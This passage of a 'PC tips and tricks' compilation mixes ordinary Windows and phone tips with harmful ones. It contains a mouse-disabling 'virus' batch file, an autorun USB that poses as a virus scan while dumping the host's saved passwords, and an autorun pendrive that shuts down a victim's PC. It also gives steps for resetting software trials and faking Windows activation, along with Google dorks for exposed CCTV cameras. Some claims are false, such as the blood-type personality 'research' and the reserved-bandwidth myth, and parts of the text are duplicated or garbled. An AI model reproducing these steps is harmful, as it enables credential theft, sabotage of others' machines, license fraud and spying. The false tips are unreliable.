that you can get access to the folder “SARAT”.
That’s all its over…. But try to save your batch file in somewhere in your computer so that it is
difficult to find it for others. But if any of your friends are computers savvy they can know your
password through the batch file.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

How to Lock folder on windows using recycle bin-


open Run in your computer or press (ctrl +R) and type ‘regedit‘ command
You can list of keys and relates values.navigate through list until you find CLSID no
of recycle bin in registry editor

For example:

CLSID no of recycle bin is >> {645FF040-5081-101B-9F08-00AA002F954E}

Now its time to lock folder using recycle bin so, lets say you want to lock folder
named ‘Folder1?

so inside notepad editor type following text like

ren folder1 recycle.{645FF040-5081-101B-9F08-00AA002F954E}

and save that files as lock.bat

To unlock related Lock folder , you can create another batch file which will unlock
folder.Type below line in another notepad file and save that as ‘unlock.bat’

ren recycle.{645FF040-5081-101B-9F08-00AA002F954E}

So, when ever you want to lock folder execute created lock.bat and reverse
execute unlock.bat for locking folder

How to make a virus that disable mouse

Steps:
1.open notepad

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

2.copy the codes given below


rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
3.save this file as virus.bat
4.done

How To Make WiFi Hotspot Easily In Windows


Hover mouse to left corner and right click on it select Command Prompt(Admin)
in your computer
Check whether your computer is supported for Hosted network or not. Type the
following command in Command Prompt
Command : netsh wlan show drivers
If the result is “YES” then proceed to Step 5 or else download the required drivers
from your vendor website.
Type “netsh wlan set hostednetwork mode=allow ssid=yourname
key=yourpassword” (enter the command without the quotations).
Note: You can use your own parameters for SSID and KEY and Password must be
greater than 8 digits.
You have successfully established the Network Connection.
Last Command you need to enter is to start hosting : netsh wlan start
hostednetwork
You have successfully hosted a network..

How to make your desktop icons Transparent

Go to:-
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

*Control Panel
*System
or right click on
My Computer
*select "Properties"
*Advanced
*Performance area
*Settings button
*Visual Effects tab
*selet the check box
*"Use drop shadows
for icon labels on
the Desktop "
*and click Apply, OK
DONE..

How to reset trial period of your software

uninstall the software and follow the steps.


*.After uninstalling software, OpenRUN(Windowskey + R) and type regedit and hit
Enter.
*.Now Registry Editor Window will appear and here navigate
toHKEY_LOCAL_MACHINE \ SOFTWARE \ Your Software name from left pane of
this window. If you find any Key name with your software name then just Delete
that Key.
*.Similarly navigate toHKEY_CURRENT_USER \ Software \ Your Software name
and if you find any key with your software name then just Delete it and close the
Registry Editor window.
*.Again go to RUN and type %temp% and hit Enter.
*.Now Delete all the things in that folder. Don’t worry these are the temporary
files and not necessary for your operating system.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

*.Now go to C:\Users\your username here\AppData.Under AppData open all


three folders"Local","Local Low" and "Roaming”and check. Under these three
folders if you find any folder or anything with your Software's name, just delete it.
*.Now Restart your PC and install the expired software and you can use it again
for trial period.

how to Reveal Hidden Passwords (Asterisks) in Web Browsers-:

see+the+passwords+behind+astericks+or+dots
Remember the situation, signing into your account with just a single click because
browser is saving all your passwords for you. We know this is convenient but since
you’re not typing your passwords any-more, eventually you’ll forget your
password in a few days. For security reasons, the password field in all browsers is
masked with “asterisks” which won’t allow any third person (even you) to read
the origi-nal typed password. But, what if you want to reveal the string behind the
asterisks? There is actually few workaround for revealing the original passwords
behind the asterisk and over the entire course of this article we’ll be discussing
some known ways to reveal the characters behind the asterisks in different
browsers.
Reveal Passwords Behind Asterisks or Dots in Different Web Browsers:

Google Chrome:

Starting off with Google chrome, the easiest way to reveal the original passwords
behind the asterisk is using inbuilt Inspect element feature in the browser.
You just need to right click on the password field in the browser where you will
get an option "Inspect Element".
After clicking on it, "Web Inspector" will open..

HOW TO ROOT ANDROID PHONE

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Today I'll teach you how to Root Android Phone. (Check Compatible Phone List).
Note:- I am not Responsible for any LOSS you do to Your Device.

1 - Download Rooting Software Click Here (Kingo Android Root from its Official
web)www.oneclickroot.com
2 - Enable USB Debugging on your Phone. (Settings - Developer options - USB
Debugging)

3 - Connect your Phone via USB Cable.

4 - when you see message Phone Connected Click Root.


5 - Wait for Some time , you are Done.

Expand your Phone Beyond Limits..!!

How To Run Games Without Graphics Card

Using this tutorial you will able to run high end


games on low-end computer easily
without having good graphics card. I
am sure many of you facing this
graphics card problem. As we with the
advancement in technology my people
are unable to run games. So, is there
any need to buy new Pc/Laptop or
graphics card to run games? Well no,
by using the below method you can
run games which requires graphics
card. Lets start here:-

How To Run/play Games Without


Graphics Card :-

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Using 3D-Analyze :-

3D Analyze is a powerful application


that allows to play many DirectX
based games using video hardware
officially unsupported and unable to
run these.With it you can optimize
efficiency, above all if your CPU will
permit, although still with a low
range card. This program supports
Direct3D as much as OpenGL,
whichever
it may be to optimize your
system.Now I'will show you how to
install and configure 3D-Analyze main
settings
to play gamesfor this just follow the
following steps:-

Step 1: First of all download the 3D


analyze .

Step 2: Now install and run the 3D


analyze.

Step 3: Now click on select option as


below and then a window opens where
you have to select the exe file of the
game which you wants to run.

Step 4: Now you can see names,


vendorID and deviceID of different
graphics cards. Select any one of
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

them and enter the VendorID and


DeviceID in the column at the left side.

Step 5: Just click on Run button and

Enjoy !!

Using SwiftShader :-

SwiftShader’s modular architecture is


capable of supporting multiple
application programming interfaces,
such as DirectX® 9.0, and OpenGL®
ES 2.0,
the same APIs that developers are
already using for existing games and
applications. SwiftShader can
therefore be directly integrated into
applications
without any changes to source
code.It is also similar to 3D analyze.

Step 1: First of all download the


SwiftShader.

Download Swiftshader 3.0 for x86bits

Download Swiftshader 3.0 for x64bits

Step 2: Now extract the zip file of


SwiftShader.

Step 3: Now copy d3d9.dll file from


BY: KHALID CHAUDHARY
PC TIPS AND TRICK

the extracted folder.

Step 4: Paste the d3d9.dll file to the


game's directory.

Step 5: Just click on exe file of your


game where you placed the d3d9.dll file and Enjoy !!

HOW TO SCHEDULE AUTO SHUTDOWN IN WINDOWS 7


We can schedule task to shutdown at specific time, but you will not be able to
shutdown at 30 minutes after logon.
Follow below steps to schedule task:
a. Go to Start > Control Panel > System and Security > Administrative Tools and
click on the Task Scheduler.
b. From the Action menu in Task Scheduler, click "Create Basic Task..."
c. In the "Create Basic Task Wizard" windows that pops up, Type in a title and a
description. Something basic like "PC Shutdown."
d. Click "Next."
e. On the "Task Trigger" screen, choose the frequency with which you want the
Shutdown PC to run. For nightly shutdown, click on "daily" and click the Next"
button.
f. On the "Daily" screen, enter the date and time you want your PC to shutdown.
Click "Next."
g. On the "Action" screen, choose "Start a program" and click "Next."
h. On the "Start a Program" screen, type C:\Windows\System32\shutdown.exe in
the "Program/script" text field.
i. In the Add arguments text field type /s.
j. Click "Next."
k. Confirm your settings on the Summary screen and click "Finish."
Now your Windows 7 computer will automatically shutdown at the same time
every day/night.

How to Sniff Passwords Using USB Drive

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Notice: You Must Diasable your Antivirus for creating a USB Sniffer.

Download these Five tools first.


1.Mail Passview
2.IE Passview
3.MessenPass
4.Password Fox
5.Protected Storage Passview

After Downloading these tools , just copy the mspass.exe, mailpv.exe, iepv.exe,
pspv.exe and passwordfox.exe files and save it on your USB drive.

Now open your notepad and type the following text in it.
[autorun]open=launch.bat
ACTION= Perform a Virus Scan

And now save the notepad as autorun.inf on your USB Drive.

Now Again open your notepad and type


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

And save the notepad as launch.bat , now copy the launch.bat on to your USB
Drive.

Now Insert the USB on your pc, then autorun pop up appears , click on perform
virus scan then the passwords which are saved on your pc will be stored in a USB
Drive.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

How To Speed Up Window 7 In 3 Simple Step

Step 1 : Temp
1. Press Start + R
2. Type in : %temp%
3. Delete all junks & cookies file in the temp folder (Note : Some file won't allow
you to delete, so just skip it )
4. Done
Step 2 : Prefetch
1. Press Start + R
2. Type in : prefetch
3. Delete all the history & unnecessary file the prefetch folder
4. Done
Step 3 : Cleanup & Defragment
1. Clean up Drive : Go to Start >>> All Programs >>> Accessories >>> System Tools
>>> Disk Cleanup
2. Defragment Drive : Go to Start >>> All Programs >>> Accessories >>> System
Tools >>> Disk Defragmenter
3. Enjoy..

How to unlock my memory card

Step 1: download xplorer and install it on your mobile

Step 2: insert micro sd card in your mobile( don’t open it)

Step 3: run xplorer and press ‘0’ and mark the option

“show system files”

Step 4: now go to c:/sys/data from fileexplorer and open the file “mmcstore”

Step 5: once you open, you will see your password like below example.on the 3 rd
column you will see the code like this
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

Tm5se9ec (??”?x???p?a?s?s?w?o?r?d)

Character between the question mark sign(?) is your password.

Thus my password is “password”

How to Use Color full alphabetical word on facebook


Just type the following codes

in chat box.....!!!

How to Use It...???

The best way to use them is

to insert a space in each of

the alphabet code.

For example if you want to

type hi just type ..

External Image

External Image Test it

and enjoy it .. have a fun:-)

Codes....:

External Image = A

External Image = B

External Image = C

External Image = D

External Image = E
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

External Image = F

External Image = G

External Image = H

External Image = I

External Image = J

External Image = K

External Image = L

External Image = M

External Image = N

External Image = O

External Image = P

External Image = Q

External Image = R

External Image = S

External Image = T

External Image = U

External Image = V

External Image = W

External Image = X

External Image = Y

External Image = Z

enjoy!!!

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

How to use keyboard as mouse

How to Use Keyboard as Mouse in


Windows
Windows OS has an Inbuilt option Called
MouseKeys, Not much people are aware
of it but yes now you are. You can
Enable/disable and disable MouseKeys
very Easily.
You can Enable it by Pressing Alt +
Shift + Numlock keys. As soon as you
do it, you will be prompt with the dialog box, Just Click Yes to it.
Make Sure your Numlock is Off while
you Use keyboard as mouse.
Done !!! Now you will see MouseKeys
icon on your taskbar, which means
now you are all set.
Now talking about the Controllers, Use
8,2,4 and 6 Keys from Numpad to
move Up, Down, Left and Right
Respectively.

How to View Face book Private Profile Photo In Large Size?

Sometime you want to see clear image of someone on facebook who might not
be your friend but his/her privacy setting stop you from doing this. In this tutorial i
will teach you to view facebook private or locked profile picture in large size with
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

very simple trick.

How To View Facebook Locked Profile Picture ?


1. Open the facebook profile of person whose profile picture is locked or is set to
private.
2. Right click on the profile picture and click on Copy Image Url as shown in image
below.
Facebook Private Profile Photo

3. Open that image in new tab by right clicking and selecting Paste (CTRL + V)
4. Now change the value of image size highlighted below which might be
s160x160 to s720x720 (If its not clear try (s320x320)
Facebook Private Profile Photo
5. The image will enlarge in size. This trick does not always work.

HOW TO WATCH YOUTUBE VIDEOS IN VLC MEDIA PLAYER

Step 1: Open VLC media player, Press CTRL+N Keys to Open up Network URL
Dialog box...
Step 2: Open Youtube, Navigate to Whatever Video you want to Play in VLC, Copy
the Url of that video and Paste it in the Dialogue Box and Click on Play....
Step 3: Enjoy Your Video...

INSTALL APPLICATION IN ANDROID BY PC

At least for one time u should activate internet services from ur network.
Then download Astro File Manager (2 MB) to your android mobile.
Install it and that's it.
Now disconnect from internet services from your network operator.
Download .apk files from Android Freeware: Download Free Android Software
and Games or any other similar site to ur computer.
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

Connect ur phone to computer. Copy all .apk files into the memory card of ur
phone.
Browse these .apk files through Astro File Manager and u can install them without
the need of android market anymore......
This procedure is simple once u get used to it.
This is just to avoid high internet download charges from network operators than
cable internet.

Interesting Facts about Youtube

> More than 1 billion unique users visit YouTube each month

> Over 4 billion hours of video are watched each month on


YouTube

> 72 hours of video are uploaded to YouTube every minute

> 70% of YouTube traffic comes from outside the US

> YouTube is localized in 53 countries and across 61 languages

> In 2011, YouTube had more than 1 trillion views or around 140
views for every person on Earth.Interesting Facts about You tube :

> More than 1 billion unique users visit YouTube each month

> Over 4 billion hours of video are watched each month on


YouTube

> 72 hours of video are uploaded to YouTube every minute

> 70% of YouTube traffic comes from outside the US

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

> YouTube is localized in 53 countries and across 61 languages

> In 2011, YouTube had more than 1 trillion views or around 140
views for every person on Earth.Interesting Facts about You tube :

> More than 1 billion unique users visit YouTube each month

> Over 4 billion hours of video are watched each month on


YouTube

> 72 hours of video are uploaded to YouTube every minute

> 70% of YouTube traffic comes from outside the US

> YouTube is localized in 53 countries and across 61 languages

> In 2011, YouTube had more than 1 trillion views or around 140
views for every person on Earth.

INTERNET ERROR CODES!!

Error 400 - Bad request.


Error 401 - unauthorized
request.
Error 403 - forbidden.
Error 404 - Not found.
Error 500 -Internal error.
Error 501 - Not Implemented
Error 502 - Bad Gateway
Error 503 -Service unavailable.
Error 504 - Gateway Time-Out
Error 505 - HTTP Version not
supported/DNS Lookup Fail/
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

unknw host
Error 500-599 - Server Errors.

This is very latest n interesting research about all 8 blood Group

A(+) : Good Leadership


A(-) : Hard Working
B(+) : Can give up (sacrifices) for others
B(-) : Non Flexible , Selfish n Sadistic
0(+) : Sharp Minded, very difficult to
understand
0(-) : Narrow Minded
AB(+) : Born to Help
AB(-) : Intelligent !

DIFFERENCE BETWEEN CORE I3, CORE I5, CORE I7..


► Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of processor
resources)
* 3-4 MB Cache
* 32 nm Silicon (less heat and energy)

► Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

* Hyper-Threading (efficient use of processor


resources)
* 3-8 MB Cache
* 32-45 nm Silicon (less heat and energy)

► Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of processor
resources)
* 4-8 MB Cache
* 32-45 nm Silicon (less heat and energy)

8 semesters are there

80 GB syllabus,
80 MB we study,
80 KB we remember,
80 Bytes we answer,
BINARY marks we get,
The Degree finally we get is BE
That is Brain Empty (B.E)

LIVE WALLPAPER ON YOUR DESKTOP


HOW TO SET VIDEO AS DESKTOP WALLPAPER....
1.Open VLC Media Player.

2. Then Go to Tools >


Preference Or press CTRL + P and Select Video from left panel.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

3. Then Choose DirectX video output from output drop down list.

4. Save the changes and restart VLC Media Player.

5. Play any video you would like to set as your desktop


wallpaper.

6. Then click on Video and


select DirectX Wallpaper from the drop down list.

7. Now Minimize vlc player and you will see your video
running on your desktop
as wallpaper.

8.If you want your default wallpaper back then uncheck


DirectX Wallpaper from video drop down
list.

Make ur Windows Genuine using notepad


1. Copy and Paste the following code in the Notepad.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows NT\CurrentVersion\
WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b ,6a,8d,6f,d5,33, 93,f d
"LastWPAEventLogged"=hex:d5,07 ,05,00,06,00,07, 00,0 f,00,38,00,24,00,fd,02
[HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"InstallDate"=dword:427cdd 95
"ProductId"="69831-640-1780577-45389"
"DigitalProductId"=hex:a4,00,0 0,00,03,00,00,00 ,36, 39,38,33,31,2d,36,34,30,2d,\
31,37,38,30,35,37,37,2d,34,35, 33,38,39,00,5a,00,00 ,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,00, 0d,04,89,b2,15,1b,c4 ,ee,62,4f,e6,64,6f,01,00,\
00,00,00,00,27,ed,85,43,a2,20, 01,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

00,00,00,00,00,00,00,00,00,00, 00,31,34,35,30,34,00 ,00,00,00,00,00,00,ce,0e,\


00,00,12,42,15,a0,00,08,00,00, 87,01,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00, 00,00,00,00,00,00,00 ,94,a2,b3,ac
"LicenseInfo"=hex:9e,bf,09,d0, 3a,76,a5,27,bb,f
2,da ,88,58,ce,58,e9,05,6b,0b,82,\
c3,74,ab,42,0d,fb,ee,c3,ea,57, d0,9d,67,a5,3d,6e,42 ,0d,60,c0,1a,70,24,46,16,\
0a,0a,ce,0d,b8,27,4a,46,53,f3, 17
2. Save the file with the .reg extension.
3. If you run the file means it will ask you the confirmation to add the value to
your Registry.
4. Press Yes.
5. Reboot your System.
6. Start Downloading from Microsoft Site.

Make your Computer Welcome You


Do you watch movies? Have you always loved the way how Computers in movies
welcome their users by calling out their names? I bet that you too would want to
know how you can achieve similar results on your PC and have a computer said
welcome.

Then you are at the right place, this article describes exactly how you can make
your computer welcome you like this.

With this trick, you can make your Computer welcome you in its computerized
voice. You can make your Windows based computer say "Welcome to your PC,
Username."

Make Windows Greet you with a Custom Voice Message at Startup

To use this trick, follow the instructions given below:-

Click on Start. Navigate to All Programs, Accessories and Notepad.


Copy and paste the exact code given below.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Dim speaks, speech


speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks

3. Replace Username with your own name.


4. Click on File Menu, Save As, select All Types in Save as Type option, and save
the file as Welcome.vbs or "*.vbs".
5. Copy the saved file.
6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\
Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\
Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7
and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you
will need to select showing hidden folders in Folder options to locate it.
7. Paste the file.

Make your Computer Welcome you at startup

Now when the next time you start your computer, Windows will welcome you in
its own computerized voice.

Note: For best results, it is recommended to change sound scheme to No Sounds.


You can change the sound scheme to No Sounds by following the steps given
below:-

Go to Control Panel.
Then click on Switch to Classic View.
Then Click on Sounds and Audio Devices.
Then Click on the Sounds Tab.
Select No Sounds from the Sound Scheme option.
If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in
the popup menu.
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

Click on OK.

Change Sound Scheme to No Sounds

Try it yourself to see how it works. In my personal opinion, this is an excellent


trick. Whenever I start my PC in front of anybody and the PC welcomes me, the
fellow is left wondering how brilliant a computer do I have.

Make your trial quick heal antivirus lifetime

Hey guys, again with a tricky trick..


OK lets start
1>First Install trial Quick Heal antivirus and use it for 1 month.
2>When its get expire then unistall antivirus and download 'Quick Heal Removeble
Tools' from this website-

http://www.4shared.com/get/sItexZnP/quick_heal_2012_completly_clea.html

3>Install all these files one by one and then restart your Computer

4>Now install quick heal antivirus again


You will see, It will install and work properly.

Creating A Shutdown Shortcut which cant be stop if Started once, There is


only one way to stop it

Here We Go

Step.1 Right click on desktop then New and then click on Shortcut

Step.2 Type following code


Shutdown -s -t 120 -c "Anything you want to write"

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

Note:- | 120 is time to Shutdown which is in seconds so you can change that time according to you but
remeber this is in seconds |

Step.3 Click on next any write name of shortcut anything you wantand then finish it.

Step.4 Now double click on that shortcut and you will see a massege box like d pic.

So now there is only one way to stop that

Go to Run and type

Shutdown -a

And hit enter and you will see that That massege has stopped.

If you want it to more harmfull Put it Startup folder but dont miss use it.

Enjoy

Hey again with a cool trick


You want to move photos in the circle like this...
okey See how to do this
Open Internet explorer, again saying that it should not work on firefox, google croome whater...
After it open google then choose images and search for any images you want after it when Images loads
then copy the following code at your address bar

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;
DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[
i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

then hit Enter


See Magic and Enjoy...
You can try it at anywebsite

If you look carefully in the above code, its rotating the HTML “img” tag. Just replace it with “a” or “p” and
watch some links or text rotate instead of images

How to watch Security Cameras on Internet


Step 1. Open internet your web browser.
Step 2. Go to a search engine of your choice (i.e. Google, Yahoo, etc.), and input any of the search
commands as listed
below.
Step 3. After you search one of these queries, you will see some search results, click on any one of them.
Step 4. Depending on the type of camera that you have access to, you may be able to control the camera
like zoom, pan,
and tilt the camera to see what you want to.
Step 5. Do not try to get onto password protected cameras, as this will not go unnoticed if too many
attempts are made.

Some Commands to be Remember to Find Live CCTV Cameras.

inurl:/view.shtml
intitle:”Live View / – AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210″
inurl:indexFrame.shtml Axis
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

intitle:”sony network camera snc-p1″


viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”i-Catcher Console – Web Monitor”
Use these commands in Google Search and get the desired result.

NOTE- “Do not misuse this hack or attack in any illegal activities as this is for educational purpose only”

Samsung Secret Codes !

PROGRAMMER CODES!

*#06# displays phones IMEI NO.


*#9999# SW Version.
*#8888# HW Version.
*#0842# Vibrator.
*#0289# Buzzer.
*#0228# Battery Stat.
*#0782# RTC Display (?¿)
*#0523# LCD Contrast.
*#0377# NVM error log (?¿)
*#5646# GSM Logo Set.
*#0778# Sim Serv, Table. (?¿)
*#0638# SIM Network ID.
*#0746# SIM info.
*#0076# Production No.
*#3323# Forced Crash (?¿ don't know, but dose not sound good)
*#2576# SIM error.
*#4357# This screen ( the actural help screen)
*#9324# Netmon <> press the hung up key to exit.
*#0778# To see what your SIM suportes.
*#0746# Your sim type.
*#32439483 Digital Audio Interference off.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

*#32436837# Digital Audio Interference on.


*#9998*JAVA# Edit GPRS/CSD settings (S100 only).
*#9998*Help# Screen / List of codes.
*#9998*RTC# RTC Display.
*#9998*bat# Battery Status.
*#9998*buz# Turns Buzzer On.
*#9998*vub# Turns Vibator On.
*#9998*LCD# LCD Contrast.
*#9998*9999# Sotfware Version.
*#9998*8888# Hardware Version.
*#9998*377# Non Volatile Merory Error Log.
*#9998*NET# SIM NEtwork ID
*#9998*778# SIM Serv. Table.
*#9998*968# Remider Tune.
*#9998*NVM# Displays Non-Volitile Mermory Status.
*#9999*C# Netmon.
*#9998*2576# Forces SIM Error.
*#9998*DEAD# Forces Phone Crash.
*#9998*533# (LED).
*#999* Show date and alarm clock.
*#8999*638# show network information.
*#9998*5646# change operator logoat startup.
*#9998*968# View melody alarm.

*2767*MEDIA# Resets the media on phone <>DELETES all downloaded


PICS/TONES <>
*2767*FULL# Resets the EEPRON* <>°DANGEROUS°<>
*2767*CUST# Resets the sustom EEPRON.
*2767*JAVA# Resets JAV downloads ( dealets all downloaded midits)
*2767*STACKREST# RESETS STACK.
*2767*225RESET# * VERY Dangerous.

#0111*0000000# Removes SIM Lock.


BY: KHALID CHAUDHARY
PC TIPS AND TRICK

*2767*66335#
*2767*3700#
*2767*7100#
*2767*8200#
*2767*7300#
*2767*2877368#
*2767*33927#
*2767*85927#
*2767*48927#
*2767*37927#
*2767*28927#
*2767*65927#
*2767*29927#
*2767*78927#
*2767*79928#
*2767*79928#
*2767*82927#
*2767*787927#
*2767*73738927#
*2767*33667#
*2767*85667#

*2767*688# = Unlocking code


*#8999*8378# = All in one code
*#4777*8665# = GPSR Tool
*#8999*3825583# = External Display
*#8999*377# = Errors
*#2255# = call list
#*5737425# = JAVA Something chouse 2and it chrashed.

#*536961# = Java Status Code


#*536962# = Java Status Code
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

#*536963# = Java Status Code


#*53696# = Java Status Code

#*1200# = AFC DAC Val


#*1300# =IMEI
#*1400# = IMSl

#*2562# ?¿ white for 15 sec than restarts.


#*2565# Check Blocking
#*3353# check code

#*7222# = Operation Typ ( class C GSM)


#*7224# = I got ERROR !
#*7252# = Operation Typ ( Class B GPRS)
#*7271# Multi Slot ( Class 1 GPRS)
#*7271# Multi Slot ( Class 4 GPRS)
#*7337# = EEPROM Reset ( unlock and resets Wap settings)
#*2787# CRTP ON/OFF
#*3737# L1 Dbg Data
#*5133# L1 Dbg Data
#*7288# GPRS Attached
#*7287# GPRS Detached
#*7666# SrCell Data
#*7693# Sleep Act/Deact ( enable or disable the black screen after doing nothen
for a while)
#*7284# Class B/C Or GPRS
#*2256# Calibration Info
#*2286# Battery Data
#*2679# Copycat Feature (Activate or deactavite)
#*3940# External loop 9600 bps
#*8462# sleeptime
#*5176# L1 Sleep
#*5187# L1C2G Trace ( activate or deactivate)
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

#*3877# Dump Of spy trace


5/31/2006 12:15 PM
*#8999*636# Have no clue i see 20 lines
*#8999*8376263# HW Ver SW Ver and build date
*#746565# Checks the locks
*7465625*638*Code# Enables Network lock
#7465625*638*Code# Disables Network lock
#7465625*782*code# Disables Subset lock
*7465625*782*code# Enables subset lock

*7465625*746*code# Enables SIM lock


#7465625*746*code# disables SIM lock

*7465625*28746# Auto SIM lock On


#7465625*28746# Auto SIM lock Off

(*Known Unlock CODES*)

S500/ P400/ E500/ E700/ X100/ X600/ E100/


Enter *2767*3855# with and accepted SIM card If this codes fails, Enter
*2767*688# or #*
7337#

A300/ A400 / A800


*2767*637#

SHUTDOWN YOUR PC WITH A CELL PHONE

1. First, you need the batch files to perform the Shutdown, Hibernate etc. You can
write them down yourselves

2. open notepad

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

and type

c:\windows\system32\shutdown -s -f -t 00

and save it as shutdown.bat

3. Open up Microsoft Outlook. Make sure that you have already configured it for
your email.Now we will need to make it so that Outlook checks your inbox about
every minute (1 minute for testing time can be increased if a delayed shutdown is
desired). You can do this by going to Tools: Options.

4. Then click the Mail Setup tab, and afterwards, the Send/Receive button.

5. Make sure that the Schedule an automatic send/receive and every box are
checked, and set the number of minutes to 1. Now you may close all of these
dialog boxes.

6. Now go to Tools: Rules and Alerts. Next click the options button in the upper
right hand corner and press the Import Rules button.

7. Now select the shutdown.bat file which you have created.

8. Now, when you send a message from your phone to your e-mail address with
the subject shutdown or smsshutdown%%, your computer will shutdown.

Hope you like it...

Someone is asking to me that when he started his computer it has been shut
down automatically so I want to tell him why this happen so?? or other person
can read this for knowledge..

Hack Friends ComPuter Using Pendrive (noob way)


Step 1:>>copy this code into notepad:

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

@echo off
shutdown -s -t 00
Save as besthacking.bat extension (for eg: besthacking.bat).
Step 2:
Now open the notepad and copy this code:
[autorun]
Open=besthacking.bat
Action=Mouse Disable
Save it as "autorun.inf"
Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off
automatically.

Speed up your internet by 20% :


Microsoft reserves 20% of your available bandwidth for their own purposes like
Windows Updates and interrogating your PC etc

You can get it back:

Click Start then Run and type "gpedit.msc" without quotes. This opens the group
policy editor.
Then go to:
--> Local Computer Policy
--> Computer Configuration
--> Administrative Templates
--> Network
--> QOS Packet Scheduler
--> Limit Reservable Bandwidth.

Double click on Limit Reservable bandwidth.


ENABLE reservable bandwidth, then set it to ZERO and press ok. This will allow the

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

system to reserve nothing, rather than the default 20%.It works on Win 2000 as
well.

Steps To Enable Hibernate Option in Windows 8.


Open start menu by pressing windows button or clicking on it.
Search Power Options and select the settings tab.
Click Change what the power buttons do.
Click Change settings that are currently unavailable.
Scroll down to Shutdown settings.
Check the box of Hibernate.
After checking the box click save changes.
Congratulations now you have enabled the Hibernate Option in Windows 8 by
simply following the above 7 easy steps. Now go to power menu and you will see
the hibernate option in it. Keep using hibernate & save your work as it is.

The top 20 places to find the world's fastest internet:

1. Hong Kong, 65.4 Mbps

2. South Korea, 63.6 Mbps

3. Japan, 52 Mbps

4. Singapore, 50.1 Mbps

5. Israel, 47.7 Mbps

6. Romania, 45.4 Mbps

7. Latvia, 43.1 Mbps

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

8. Taiwan, 42.7 Mbps

9. Netherlands, 39.6 Mbps

10. Belgium, 38.5 Mbps

11. Switzerland, 38.4 Mbps

12. Bulgaria, 37 Mbps

13. United States, 37 Mbps

14. Kuwait, 36.4 Mbps

15. United Arab Emirates, 36Mbps

16. Britain, 35.7 Mbps

17. Canada, 34.8 Mbps

18. Czech Republic, 34.8 Mbps

19. Macau, 34.4 Mbps

20. Sweden, 33.1 Mbps

This code is enough for crashing down any computer in oops(c,c+


+,java ,python)

int i;
while(i<=100000 0000)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

{
